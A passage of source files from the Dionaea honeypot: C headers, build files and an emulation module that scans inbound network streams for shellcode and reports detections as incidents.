22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | #include 31 | 32 | #define PORT_STRLEN 6 33 | #define IFNAM_STRLEN 16 34 | #define INET_STRLEN INET6_ADDRSTRLEN 35 | 36 | #define NODE_STRLEN 1 + INET_STRLEN + 1 + 1 + IFNAM_STRLEN + 1 + 1 + PORT_STRLEN 37 | 38 | struct node_info 39 | { 40 | struct sockaddr_storage addr; 41 | int domain; // socket domain 42 | char ip_string[INET_STRLEN+1]; 43 | char port_string[PORT_STRLEN+1]; 44 | uint16_t port; 45 | char node_string[NODE_STRLEN+1]; 46 | 47 | char iface_scope[IFNAM_STRLEN+1]; // required for ipv6 scope id 48 | char *hostname; 49 | 50 | 51 | struct 52 | { 53 | char **resolved_addresses; 54 | uint8_t resolved_address_count; 55 | uint8_t current_address; 56 | 57 | struct dns_query *a; 58 | struct dns_query *aaaa; 59 | } dns; 60 | }; 61 | 62 | bool node_info_set(struct node_info *node, struct sockaddr_storage *sa); 63 | void node_info_add_addr(struct node_info *pi, const char *addr); 64 | char *node_info_get_ip_string(struct node_info *node); 65 | char *node_info_get_port_string(struct node_info *node); 66 | void node_info_set_port(struct node_info *node, uint16_t port); 67 | void node_info_set_addr(struct node_info *node, char *addr); 68 | void node_info_addr_clear(struct node_info *node); 69 | const char *node_info_get_next_addr(struct node_info *node); 70 | -------------------------------------------------------------------------------- /include/pchild.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published 
by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | 30 | struct GMutex; 31 | 32 | struct pchild 33 | { 34 | int fd; 35 | /** 36 | * mutex for the pchild 37 | * as threads may use the child for their very own purpose too, 38 | * lock the child if it is busy 39 | * 40 | * locking has to be done 'client' side 41 | */ 42 | GMutex *mutex; 43 | }; 44 | 45 | 46 | struct pchild *pchild_new(void); 47 | bool pchild_init(void); 48 | int pchild_sent_bind(int sx, struct sockaddr *s, socklen_t size); 49 | 50 | 51 | /** 52 | * declaration of a pchild function 53 | * if you want the pchild do something for you, you send a 54 | * pointer to a pchild_cmd function the pchild will call the 55 | * function, and your own function can take care, powered with 56 | * pchild privileges 57 | */ 58 | typedef void (*pchild_cmd)(int s); 59 | -------------------------------------------------------------------------------- /include/processor.h: -------------------------------------------------------------------------------- 1 | #ifndef HAVE_STREAMPROCESSOR_H 2 | #define HAVE_STREAMPROCESSOR_H 3 | 4 | #include 5 | 6 | #include "bistream.h" 7 | #include "refcount.h" 8 | 9 | struct connection; 10 | struct lcfgx_tree_node; 11 | 12 | struct processors 13 | { 14 | GNode *tree; 15 | GHashTable 
*names; 16 | }; 17 | 18 | 19 | enum processor_state 20 | { 21 | processor_done, 22 | processor_continue 23 | }; 24 | 25 | struct processor_data; 26 | 27 | 28 | typedef void *(*processor_cfg_new)(struct lcfgx_tree_node *node); 29 | typedef bool (*processor_process)(struct connection *con, void *config); 30 | typedef void *(*processor_ctx_new)(void *cfg); 31 | typedef void (*processor_ctx_free)(void *ctx); 32 | typedef void (*processor_close)(struct connection *con, struct processor_data *pd); 33 | typedef void (*processor_io)(struct connection *con, struct processor_data *pd, void *data, int size); 34 | typedef void (*processor_thread_io)(struct connection *con, struct processor_data *pd); 35 | 36 | struct processor 37 | { 38 | const char *name; 39 | processor_cfg_new cfg; 40 | processor_process process; 41 | processor_ctx_new new; 42 | processor_ctx_free free; 43 | processor_io io_in; 44 | processor_io io_out; 45 | processor_thread_io thread_io_in; 46 | processor_thread_io thread_io_out; 47 | void *config; 48 | }; 49 | 50 | 51 | struct processor_data 52 | { 53 | enum processor_state state; 54 | GMutex *mutex; 55 | struct refcount queued; 56 | struct processor *processor; 57 | void *ctx; 58 | struct bistream *bistream; 59 | 60 | GList *filters; // of type struct stream_processor_data 61 | }; 62 | 63 | bool processors_tree_create(GNode *tree, struct lcfgx_tree_node *node); 64 | void processors_tree_dump(GNode *tree, int indent); 65 | 66 | void processors_init(struct connection *con); 67 | void processors_clear(struct connection *con); 68 | 69 | void processors_io_out(struct connection *con, void *data, int size); 70 | void processors_io_in(struct connection *con, void *data, int size); 71 | struct processor_data *processor_data_new(void); 72 | void processor_data_free(struct processor_data *pd); 73 | 74 | #endif 75 | -------------------------------------------------------------------------------- /include/protocol.h: 
-------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_PROTOCOL_H 29 | #define HAVE_PROTOCOL_H 30 | 31 | #include 32 | 33 | struct connection; 34 | 35 | 36 | /* protocol error codes */ 37 | 38 | enum connection_error 39 | { 40 | ECONDNSTIMEOUT = 0, 41 | ECONUNREACH = 1, 42 | ECONNOSUCHDOMAIN = 2, 43 | ECONMANY = 4, 44 | ECONMAX = 5 45 | }; 46 | 47 | typedef void (*protocol_handler_established)(struct connection *con); 48 | typedef bool (*protocol_handler_error)(struct connection *con, enum connection_error error); 49 | typedef void (*protocol_handler_origin)(struct connection *con, struct connection *origin); 50 | typedef unsigned int (*protocol_handler_io_in)(struct connection *con, void *context, unsigned char *data, uint32_t size); 51 | typedef void (*protocol_handler_io_out)(struct connection *con, void *context); 52 | 53 | typedef bool (*protocol_handler_disconnect)(struct connection *con, void *context); 54 | typedef bool (*protocol_handler_timeout)(struct connection *con, void *context); 55 | typedef void *(*protocol_handler_ctx_new)(struct connection *con); 56 | typedef void (*protocol_handler_ctx_free)(void *data); 57 | typedef void (*protocol_handler_name)(void *ctx); 58 | 59 | struct protocol 60 | { 61 | char *name; 62 | protocol_handler_ctx_new ctx_new; 63 | protocol_handler_ctx_free ctx_free; 64 | protocol_handler_origin origin; 65 | protocol_handler_established established; 66 | protocol_handler_error error; 67 | protocol_handler_timeout sustain_timeout; 68 | protocol_handler_timeout idle_timeout; 69 | /** 70 | * Callback for timeouts when waiting to accept a connection 71 | */ 72 | protocol_handler_timeout listen_timeout; 73 | protocol_handler_disconnect disconnect; 74 | protocol_handler_io_in io_in; 75 | protocol_handler_io_out io_out; 76 | void *ctx; 77 | }; 78 | 79 | #endif 80 | 
-------------------------------------------------------------------------------- /include/refcount.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_REFCOUNT_H 29 | #define HAVE_REFCOUNT_H 30 | 31 | #include 32 | #include 33 | 34 | struct refcount 35 | { 36 | GMutex *mutex; 37 | int refs; 38 | }; 39 | 40 | void refcount_init(struct refcount *rc); 41 | void refcount_exit(struct refcount *rc); 42 | void refcount_inc(struct refcount *rc); 43 | void refcount_dec(struct refcount *rc); 44 | bool refcount_is_zero(struct refcount *rc); 45 | 46 | #endif 47 | -------------------------------------------------------------------------------- /include/signals.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | 31 | struct ev_loop; 32 | struct ev_signal; 33 | 34 | struct signals 35 | { 36 | struct ev_signal sigint; 37 | struct ev_signal sighup; 38 | struct ev_signal sigsegv; 39 | }; 40 | 41 | 42 | void sigint_cb(struct ev_loop *loop, struct ev_signal *w, int revents); 43 | void sighup_cb(struct ev_loop *loop, struct ev_signal *w, int revents); 44 | void sigsegv_cb(struct ev_loop *loop, struct ev_signal *w, int revents); 45 | 46 | int segv_handler(int sig); 47 | void sigsegv_backtrace_cb(int sig); 48 | 49 | -------------------------------------------------------------------------------- /include/threads.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #include 29 | #include 30 | 31 | 32 | struct connection; 33 | 34 | 35 | struct threads 36 | { 37 | GThreadPool *pool; 38 | struct ev_async trigger; 39 | struct ev_periodic surveillance; 40 | GAsyncQueue *cmds; 41 | }; 42 | 43 | void trigger_cb(struct ev_loop *loop, struct ev_async *w, int revents); 44 | void surveillance_cb(struct ev_loop *loop, struct ev_periodic *w, int revents); 45 | void threadpool_wrapper(gpointer data, gpointer user_data); 46 | 47 | 48 | struct thread 49 | { 50 | GFunc function; 51 | struct connection *con; 52 | void *data; 53 | }; 54 | 55 | struct thread *thread_new(struct connection *con, void *data, GFunc function); 56 | 57 | 58 | /** 59 | * prototype for callbacks and data which are meant to be run in 60 | * the main loop - from threads 61 | * @see threads.cmds 62 | */ 63 | typedef void (*async_cmd_cb)(void *data); 64 | 65 | 66 | /** 67 | * data for async cmds 68 | * pointer to function and data, 69 | * insert into dionaea->threads.cmds 70 | * trigger dionaea->threads.trigger 71 | * and your function will be run in the main loop 72 | * 73 | * @see threads.cmds 74 | * @see threads.trigger 75 | */ 76 | struct async_cmd 77 | { 78 | async_cmd_cb function; 79 | void *data; 80 | }; 81 | 82 | 83 | struct async_cmd *async_cmd_new(async_cmd_cb function, void *data); 84 | void async_cmd_free(struct async_cmd *cmd); 85 | /* 86 | void async_add_io(void *data); 87 | void async_del_io(void *data); 88 | 89 | void async_add_child(void *data); 90 | void async_del_child(void *data); 91 | */ 92 | void async_incident_report(void *data); 93 | -------------------------------------------------------------------------------- /include/util.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | 
* Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | #ifndef HAVE_UTIL_H 29 | #define HAVE_UTIL_H 30 | 31 | #include 32 | #include 33 | 34 | #ifndef s6_addr32 35 | #define s6_addr32 __u6_addr.__u6_addr32 36 | #endif 37 | 38 | void *ADDROFFSET(const void *x); 39 | unsigned int ADDRSIZE(const void *x); 40 | void *PORTOFFSET(const void *x); 41 | 42 | bool sockaddr_storage_from(struct sockaddr_storage *ss, int family, void *host, uint16_t port); 43 | bool parse_addr(char const * const addr, char const * const iface, uint16_t const port, struct sockaddr_storage * const sa, int * const socket_domain, socklen_t * const sizeof_sa); 44 | 45 | int ipv6_addr_linklocal(struct in6_addr const * const a); 46 | int ipv6_addr_v4mapped(struct in6_addr const * const a); 47 | 48 | struct tempfile 49 | { 50 | int fd; 51 | FILE *fh; 52 | char *path; 53 | }; 54 | 55 | struct tempfile *tempfile_new(char *path, char *prefix); 56 | struct tempfile *tempdownload_new(char *prefix); 57 | void tempfile_close(struct tempfile *tf); 
58 | void tempfile_unlink(struct tempfile *tf); 59 | void tempfile_free(struct tempfile *tf); 60 | 61 | #endif 62 | -------------------------------------------------------------------------------- /m4/az_bind_ipv4_mapped_localhost.m4: -------------------------------------------------------------------------------- 1 | AC_DEFUN([AZ_FUNC_BIND_MAPPED_IPV4_LOCALHOST], 2 | [AC_CHECK_FUNCS(bind) 3 | AC_MSG_CHECKING([if bind("::ffff:0.0.0.0") works]) 4 | AC_CACHE_VAL(ac_cv_have_bind_ipv4_mapped_localhost, 5 | [AC_RUN_IFELSE( 6 | [#include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | int main(int argc, char **argv) 17 | { 18 | int s = socket(PF_INET6, SOCK_STREAM, 0); 19 | int r = -1; 20 | struct sockaddr_in6 si6; 21 | memset(&si6,0,sizeof(struct sockaddr_in6)); 22 | inet_pton(PF_INET6, "::ffff:0.0.0.0", &si6.sin6_addr); 23 | si6.sin6_family = PF_INET6; 24 | r = bind(s, (struct sockaddr *)&si6, sizeof(struct sockaddr_in6)); 25 | close(s); 26 | return r; 27 | }], ac_cv_have_bind_ipv4_mapped_localhost=yes, ac_cv_have_bind_ipv4_mapped_localhost=no, ac_cv_have_bind_ipv4_mapped_localhost=cross)]) 28 | AC_MSG_RESULT([$ac_cv_have_bind_ipv4_mapped_localhost]) 29 | ]) 30 | -------------------------------------------------------------------------------- /modules/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.am 2463 2008-10-13 10:32:47Z common $ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | if BUILD_PYTHON_MODULE 6 | python_dir = python 7 | endif 8 | 9 | if BUILD_EMU_MODULE 10 | emu_dir = emu 11 | endif 12 | 13 | if BUILD_CURL_MODULE 14 | curl_dir = curl 15 | endif 16 | 17 | if BUILD_NL_MODULE 18 | nl_dir = nl 19 | endif 20 | 21 | if BUILD_PCAP_MODULE 22 | pcap_dir = pcap 23 | endif 24 | 25 | if BUILD_NFQ_MODULE 26 | nfq_dir = nfq 27 | endif 28 | 29 | if BUILD_XMATCH_MODULE 30 | xmatch_dir = xmatch 31 | endif 32 | 33 | 34 | SUBDIRS = nc 
$(python_dir) $(emu_dir) $(curl_dir) $(nl_dir) $(pcap_dir) $(nfq_dir) 35 | DIST_SUBDIRS = nc python emu curl nl pcap nfq xmatch 36 | -------------------------------------------------------------------------------- /modules/curl/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_CURL_CFLAGS) 9 | AM_LDFLAGS = $(LIB_CURL_LIBS) 10 | 11 | pkglib_LTLIBRARIES = curl.la 12 | 13 | curl_la_SOURCES = module.c module.h 14 | 15 | curl_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 16 | 17 | -------------------------------------------------------------------------------- /modules/curl/module.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/curl/module.h -------------------------------------------------------------------------------- /modules/emu/Makefile.am: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | AUTOMAKE_OPTIONS = foreign 4 | 5 | AM_CFLAGS = -I$(top_srcdir)/include -I$(top_srcdir)/src 6 | AM_CFLAGS += -fms-extensions -fno-strict-aliasing 7 | 8 | AM_CFLAGS += $(LIB_EMU_CFLAGS) 9 | AM_LDFLAGS = $(LIB_EMU_LIBS) 10 | 11 | 12 | pkglib_LTLIBRARIES = emu.la 13 | 14 | emu_la_SOURCES = module.c module.h detect.c emulate.c profile.c hooks.c 15 | 16 | emu_la_LDFLAGS = -module -no-undefined -avoid-version ${AM_LDFLAGS} 17 | -------------------------------------------------------------------------------- /modules/emu/detect.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 
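Paul Baecher & Markus Koetter
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
 *
 *
 * contact nepenthesdev@gmail.com
 *
 *******************************************************************************/

#include
#include

#include
#include

#include
#include
#include
#include
#include
#include <ctype.h>
#include <errno.h>

#include "dionaea.h"
#include "processor.h"
#include "log.h"
#include "incident.h"
#include "threads.h"

#define D_LOG_DOMAIN "emu"

#include "module.h"

/*
 * Number of already-scanned bytes that are re-examined on every new chunk
 * of input, so a shellcode that straddles two reads is still presented to
 * the detector as one contiguous buffer.
 */
#define EMU_RESCAN_OVERLAP 300

/* Processor registration: the emu module only hooks inbound data, and it
 * does so through thread_io_in (see processor.h), i.e. off the main loop. */
struct processor proc_emu =
{
	.name = "emu",
	.new = proc_emu_ctx_new,
	.free = proc_emu_ctx_free,
	.cfg = proc_emu_ctx_cfg_new,
	.thread_io_in = proc_emu_on_io_in,
};

/**
 * Look up a string valued config node and parse it as a decimal integer.
 *
 * @param node  config subtree to search
 * @param path  dotted path below node
 * @param out   receives the value; untouched on failure
 * @return false when the path is missing, the text holds no number, has
 *         trailing non-blank characters, or does not fit an int
 */
static bool emu_cfg_get_int(struct lcfgx_tree_node *node, const char *path, int *out)
{
	struct lcfgx_tree_node *n;
	if( lcfgx_get_string(node, &n, path) != LCFGX_PATH_FOUND_TYPE_OK )
		return false;

	const char *text = n->value.string.data;
	char *end = NULL;
	errno = 0;
	long value = strtol(text, &end, 10);
	// strtol reports "no digits" only through end == text, and overflow only
	// through errno; both used to be silently accepted as a limit of 0
	if( errno != 0 || end == text )
		goto bad;
	while( isspace((unsigned char)*end) )
		end++;
	if( *end != '\0' )
		goto bad;
	if( value != (long)(int)value )
		goto bad;

	*out = (int)value;
	return true;

bad:
	g_warning("%s: not a valid integer: '%s'", path, text);
	return false;
}

/**
 * Look up a string valued config node and parse it as a floating point value.
 *
 * @param node  config subtree to search
 * @param path  dotted path below node
 * @param out   receives the value; untouched on failure
 * @return false when the path is missing, the text holds no number, or has
 *         trailing non-blank characters
 */
static bool emu_cfg_get_double(struct lcfgx_tree_node *node, const char *path, double *out)
{
	struct lcfgx_tree_node *n;
	if( lcfgx_get_string(node, &n, path) != LCFGX_PATH_FOUND_TYPE_OK )
		return false;

	const char *text = n->value.string.data;
	char *end = NULL;
	errno = 0;
	double value = strtod(text, &end);
	if( errno != 0 || end == text )
		goto bad;
	while( isspace((unsigned char)*end) )
		end++;
	if( *end != '\0' )
		goto bad;

	*out = value;
	return true;

bad:
	g_warning("%s: not a valid number: '%s'", path, text);
	return false;
}

/**
 * Build the emulation config from the "emulation.limits.*" subtree.
 *
 * Every limit is mandatory. The values bound what an emulated shellcode
 * may do (files, filesize, sockets, steps) and for how long (idle, listen,
 * sustain, cpu), so a missing or unparsable entry is rejected instead of
 * being read as zero.
 *
 * @param node  the module's config subtree
 * @return a freshly allocated struct emu_config, or NULL on an incomplete
 *         or invalid configuration (the partial config is freed)
 */
void *proc_emu_ctx_cfg_new(struct lcfgx_tree_node *node)
{
	g_debug("%s node %p", __PRETTY_FUNCTION__, node);
	lcfgx_tree_dump(node,0);
	struct emu_config *conf = g_malloc0(sizeof(struct emu_config));

	if( !emu_cfg_get_int(node, "emulation.limits.files", &conf->limits.files) ||
		!emu_cfg_get_int(node, "emulation.limits.filesize", &conf->limits.filesize) ||
		!emu_cfg_get_int(node, "emulation.limits.sockets", &conf->limits.sockets) ||
		!emu_cfg_get_int(node, "emulation.limits.steps", &conf->limits.steps) ||
		!emu_cfg_get_double(node, "emulation.limits.idle", &conf->limits.idle) ||
		!emu_cfg_get_double(node, "emulation.limits.listen", &conf->limits.listen) ||
		!emu_cfg_get_double(node, "emulation.limits.sustain", &conf->limits.sustain) ||
		!emu_cfg_get_double(node, "emulation.limits.cpu", &conf->limits.cpu) )
	{
		g_warning("configuration for emulation is incomplete");
		g_free(conf);
		return NULL;
	}

	g_debug(" files %i filesize %i sockets %i steps %i idle %f listen %f sustain %f cpu %f ", conf->limits.files, conf->limits.filesize,
			conf->limits.sockets, conf->limits.steps, conf->limits.idle, conf->limits.listen, conf->limits.sustain, conf->limits.cpu);

	return conf;
}

/**
 * Per-connection processor context.
 *
 * @param cfg  the struct emu_config returned by proc_emu_ctx_cfg_new
 * @return a zeroed struct emu_ctx referencing cfg; the scan offset starts at 0
 *
 * g_error() is fatal in GLib, so a NULL cfg never reaches the allocation.
 */
void *proc_emu_ctx_new(void *cfg)
{
	if( cfg == NULL )
	{
		g_error("emulation needs configuration");
	}
	struct emu_ctx *ctx = g_malloc0(sizeof(struct emu_ctx));
	ctx->config = cfg;
	return ctx;
}

/**
 * Release a context created by proc_emu_ctx_new. The config it points to is
 * owned by the processor and is not freed here.
 */
void proc_emu_ctx_free(void *ctx)
{
	g_free(ctx);
}

/**
 * Thread-side input hook: scan the connection's inbound stream for shellcode.
 *
 * The stream is fetched from EMU_RESCAN_OVERLAP bytes before the previous
 * scan end up to the current end of stream. A non-negative result from
 * emu_shellcode_test is treated as a detection at that offset within the
 * fetched buffer: a "dionaea.shellcode.detected" incident is handed to the
 * main loop through the threads.cmds queue (this callback runs in a worker
 * thread), the buffer is passed to profile(), and the processor marks
 * itself done so it is not run again for this connection.
 *
 * @param con  the connection whose stream is inspected
 * @param pd   processor data holding the emu context and the bistream
 */
void proc_emu_on_io_in(struct connection *con, struct processor_data *pd)
{
	g_debug("%s con %p pd %p", __PRETTY_FUNCTION__, con, pd);
	struct emu_ctx *ctx = pd->ctx;

	int offset = MAX(ctx->offset - EMU_RESCAN_OVERLAP, 0);
	void *streamdata = NULL;
	int32_t size = bistream_get_stream(pd->bistream, bistream_in, offset, -1, &streamdata);
	if( size == -1 )
		return;

	struct emu *e = emu_new();
#if 0
	emu_cpu_debugflag_set(emu_cpu_get(e), instruction_string);
	emu_log_level_set(emu_logging_get(e),EMU_LOG_DEBUG);
#endif
	int ret = emu_shellcode_test(e, streamdata, size);
	emu_free(e);

	// The fetch started `offset` bytes into the stream, not at ctx->offset,
	// so the absolute end of the scanned region is offset + size. Adding
	// size to ctx->offset instead overshoots the real stream length by up to
	// EMU_RESCAN_OVERLAP per call, which silently removes the overlap on
	// every call after the second.
	ctx->offset = offset + size;

	if( ret >= 0 )
	{
		struct incident *ix = incident_new("dionaea.shellcode.detected");
		GAsyncQueue *aq = g_async_queue_ref(g_dionaea->threads->cmds);
		g_async_queue_push(aq, async_cmd_new(async_incident_report, ix));
		g_async_queue_unref(aq);
		ev_async_send(g_dionaea->loop, &g_dionaea->threads->trigger);
		g_critical("shellcode found offset %i", ret);
		profile(ctx->config, con, streamdata, size, ret);

		pd->state = processor_done;
	}
	g_free(streamdata);
}
--------------------------------------------------------------------------------
/modules/emu/module.c:
--------------------------------------------------------------------------------
/********************************************************************************
 * Dionaea
 * - catches bugs -
 *
 *
 *
 * Copyright (C) 2009 Paul Baecher & Markus Koetter
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.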
13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | * 23 | * 24 | * contact nepenthesdev@gmail.com 25 | * 26 | *******************************************************************************/ 27 | 28 | 29 | #include 30 | #include 31 | 32 | #include 33 | #include 34 | 35 | 36 | #include "modules.h" 37 | #include "connection.h" 38 | #include "dionaea.h" 39 | 40 | #include "module.h" 41 | #include "log.h" 42 | #include "processor.h" 43 | 44 | #define D_LOG_DOMAIN "emu" 45 | 46 | 47 | static struct 48 | { 49 | struct lcfgx_tree_node *config; 50 | } emu_runtime; 51 | 52 | static bool emu_config(struct lcfgx_tree_node *node) 53 | { 54 | g_debug("%s", __PRETTY_FUNCTION__); 55 | emu_runtime.config = node; 56 | return true; 57 | } 58 | 59 | static bool emu_new(struct dionaea *d) 60 | { 61 | g_debug("%s", __PRETTY_FUNCTION__); 62 | g_hash_table_insert(g_dionaea->processors->names, (void *)proc_emu.name, &proc_emu); 63 | return true; 64 | } 65 | 66 | static bool emu_free(void) 67 | { 68 | g_debug("%s", __PRETTY_FUNCTION__); 69 | return true; 70 | } 71 | 72 | static bool emu_hup(struct lcfgx_tree_node *node) 73 | { 74 | g_debug("%s", __PRETTY_FUNCTION__); 75 | return true; 76 | } 77 | 78 | 79 | 80 | struct module_api *module_init(struct dionaea *d) 81 | { 82 | g_debug("%s:%i %s dionaea %p",__FILE__, __LINE__, __PRETTY_FUNCTION__, d); 83 | static struct module_api emu_api = 84 | { 85 | .config = &emu_config, 86 | .start = NULL, 87 | .new = &emu_new, 88 | .free = &emu_free, 89 | .hup = &emu_hup 90 | }; 91 | 92 | return &emu_api; 93 | 
} 94 | 95 | -------------------------------------------------------------------------------- /modules/emu/module.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | * Dionaea 3 | * - catches bugs - 4 | * 5 | * 6 | * 7 | * Copyright (C) 2009 Paul Baecher & Markus Koetter 8 | * 9 | * This program is free software; you can redistribute it and/or 10 | * modify it under the terms of the GNU General Public License 11 | * as published by the Free Software Foundation; either version 2 12 | * of the License, or (at your option) any later version. 13 | * 14 | * This program is distributed in the hope that it will be useful, 15 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | * GNU General Public License for more details. 18 | * 19 | * You should have received a copy of the GNU General Public License 20 | * along with this program; if not, write to the Free Software 21 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
